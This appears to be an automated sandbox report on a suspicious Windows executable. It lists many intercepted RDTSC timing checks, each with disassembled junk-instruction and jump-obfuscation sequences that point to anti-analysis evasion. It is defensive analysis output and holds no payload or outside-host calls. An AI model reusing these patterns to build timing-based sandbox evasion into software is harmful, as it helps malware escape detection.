Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1C43B second address: A1C441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BDD second address: A21BE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BE3 second address: A21BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21BEA second address: A21BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A23B2A second address: A23B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22C62 second address: A22C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE1010EA796h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22C7F second address: A22C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24BA4 second address: A24BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24BAA second address: A24C38 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE100E1706Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FE100E17068h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+129E394Dh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FE100E17068h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007FE100E17068h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov dword ptr [ebp+129E21D4h], ebx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f jns 00007FE100E17066h 0x00000075 pop eax 0x00000076 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24DB5 second address: A24DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24DBB second address: A24DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24E84 second address: A24E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A24E8A second address: A24E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 ja 00007FE100E17066h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BA34 second address: A2BA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FE1010EA786h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BA4B second address: A2BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BCFB second address: A2BD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD01 second address: A2BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jl 00007FE100E17066h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD10 second address: A2BD1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007FE1010EA786h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD1F second address: A2BD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD25 second address: A2BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FE1010EA786h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD44 second address: A2BD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2BD48 second address: A2BD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E850 second address: A2E854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E854 second address: A2E877 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FE1010EA78Ch 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E877 second address: A2E87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E87D second address: A2E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE1010EA799h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA797h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A2E8B6 second address: A2E8C0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE100E17066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C529B second address: 9C52CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE1010EA786h 0x0000000c jng 00007FE1010EA786h 0x00000012 popad 0x00000013 jmp 00007FE1010EA797h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C52CD second address: 9C52D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C52D8 second address: 9C52DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A32997 second address: A3299B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3299B second address: A329D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA78Eh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FE1010EA796h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FE1010EA78Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A32ABB second address: A32AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A38F1F second address: A38F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE1010EA78Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A395B4 second address: A395BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A395BB second address: A395D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE1010EA790h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C86 second address: A39C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C93 second address: A39C9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39C9D second address: A39CA7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE100E1706Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39CA7 second address: A39CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jns 00007FE1010EA786h 0x0000000d jl 00007FE1010EA786h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39E07 second address: A39E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FE100E17066h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39E15 second address: A39E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F65 second address: A39F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F69 second address: A39F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F6D second address: A39F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F73 second address: A39F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE1010EA78Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A39F81 second address: A39F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FE100E17066h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5DF second address: A3E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5F3 second address: A3E5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E5F7 second address: A3E614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 jl 00007FE1010EA786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E614 second address: A3E61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3E61B second address: A3E624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0803A second address: A08048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FE100E17066h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08048 second address: A08062 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE1010EA78Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08062 second address: A08068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08068 second address: A0806C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0806C second address: A080B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FE100E17068h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ecx, dword ptr [ebp+12B6C6A9h] 0x00000029 lea eax, dword ptr [ebp+12B91DCFh] 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FE100E1706Fh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08678 second address: A0867D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087C0 second address: A087C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087C6 second address: A087CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A087CA second address: A087CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0885E second address: A08885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA792h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08885 second address: A0888A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A088F7 second address: A088FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0BEE5 second address: A0BEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FE100E17068h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08AC5 second address: A08ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08ACB second address: A08ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08BC3 second address: A08BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08BC8 second address: A08BCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A08C01 second address: A08C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0940F second address: A09444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 sub dword ptr [ebp+129E2F54h], eax 0x0000000d or edx, 552E5C76h 0x00000013 lea eax, dword ptr [ebp+12B91E13h] 0x00000019 push esi 0x0000001a xor cx, BC05h 0x0000001f pop edx 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE100E17072h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09444 second address: A0947B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE1010EA78Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, eax 0x00000010 lea eax, dword ptr [ebp+12B91DCFh] 0x00000016 add edx, dword ptr [ebp+129E38F9h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE1010EA78Fh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0947B second address: 9F2B6D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE100E17068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007FE100E1706Ch 0x00000014 push eax 0x00000015 jbe 00007FE100E17066h 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FE100E17068h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 xor ecx, dword ptr [ebp+129E3B35h] 0x0000003e call dword ptr [ebp+129E2F6Eh] 0x00000044 push eax 0x00000045 jo 00007FE100E17068h 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007FE100E17066h 0x00000055 jmp 00007FE100E17078h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D8E7 second address: A3D8ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D8ED second address: A3D90C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE100E17070h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D90C second address: A3D92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 je 00007FE1010EA79Dh 0x0000000e jmp 00007FE1010EA791h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3D92D second address: A3D945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17070h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DA9B second address: A3DAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DE3F second address: A3DE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A3DE45 second address: A3DE4F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4660E second address: A46635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FE100E17075h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A468AD second address: A468B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A46C41 second address: A46C60 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17072h 0x00000008 jl 00007FE100E17066h 0x0000000e jnc 00007FE100E17066h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007FE100E17086h 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A46369 second address: A4637C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE1010EA78Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4637C second address: A4638B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnc 00007FE100E17066h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A47205 second address: A4720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D3F3 second address: A4D408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE100E1706Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D408 second address: A4D40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
